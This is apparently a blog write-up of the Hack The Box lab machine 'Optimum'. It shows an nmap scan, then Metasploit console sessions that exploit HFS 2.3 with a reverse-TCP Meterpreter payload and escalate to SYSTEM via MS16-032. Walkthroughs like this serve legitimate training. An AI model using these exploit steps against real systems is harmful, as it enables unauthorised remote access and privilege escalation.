First we start by enumerating the machine as usual, let's see what we can find...

root@kali:~# nmap -sV -sC -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-01 23:20 GMT
Nmap scan report for
Host is up (0.021s latency).
Not shown: 999 filtered ports
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds

We only have port 80 open which is running HttpFileServer (HFS 2.3). After a bit of research we find that there is an exploit module using Metasploit which is 'exploit/windows/http/rejetto_hfs_exec'. There is another way to solve this box without Metasploit using Poweshell. Let's try this exploit..


msf exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port (TCP)
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/http/rejetto_hfs_exec) > set RHOST
msf exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.x.x:4444 
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /KZ2hmQPKx9
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> at 2018-01-01 23:28:32 +0000
sessions[!] Tried to delete %TEMP%\hwEtnAwc.vbs, unknown result
[*] Server stopped.

meterpreter > pwd
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x64/windows

As you can see we got meterpreter session as the user 'kostas'. The tricky part here is the architecture, you can see when we set our payload we actually used 'x64' bit meterpreter as the box architecture is x64. This because when doing privilege escalation if we have meterpreter 'x86' the exploit won't work, even if we migrated to x64 (which is odd). Let's move on and find a way to escalate our privileges, for that we can run the module 'post/multi/recon/local_exploit_suggester' which will test the box against multiple exploits and see if it is vulnerable.

msf exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf post
(multi/recon/local_exploit_suggester) > set SESSION 1
msf post
(multi/recon/local_exploit_suggester) > run

[*] - Collecting local exploits for x86/windows...
[*] - 38 exploit checks are being tried...

[+] - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] - exploit/windows/local/ms_ndproxy: The target service is running, but could not be validated.
[*] Post module execution completed
msf post

This module have checked the system against 38 exploits and returned 3 possible exploits to use, let's see ms16_032 which looks interesting. To make sure that this exploit would work we can run 'systeminfo' from our meterpreter to check the latest patches installed on the box.

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

[*] Started reverse TCP handler on 10.10.x.x:4444 
[*] Writing payload file, C:\Users\kostas\Desktop\oSUigMRDPSHjA.txt...
[*] Compressing script contents...
[+] Compressed size: 3605
[*] Executing exploit script...
[*] Sending stage (205379 bytes) to
[*] Meterpreter session 2 opened (10.10.x.x:4444 -> at 2018-01-01 23:30:12 +0000
meterpreter > shell
Process 2480 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

nt authority\system

Here we go, we got meterpreter session 2 opened and we have system privileges. Now we get both flags and mission accomplished \o/

© 2020 by Joul Kouchakji

  • White LinkedIn Icon
  • White Twitter Icon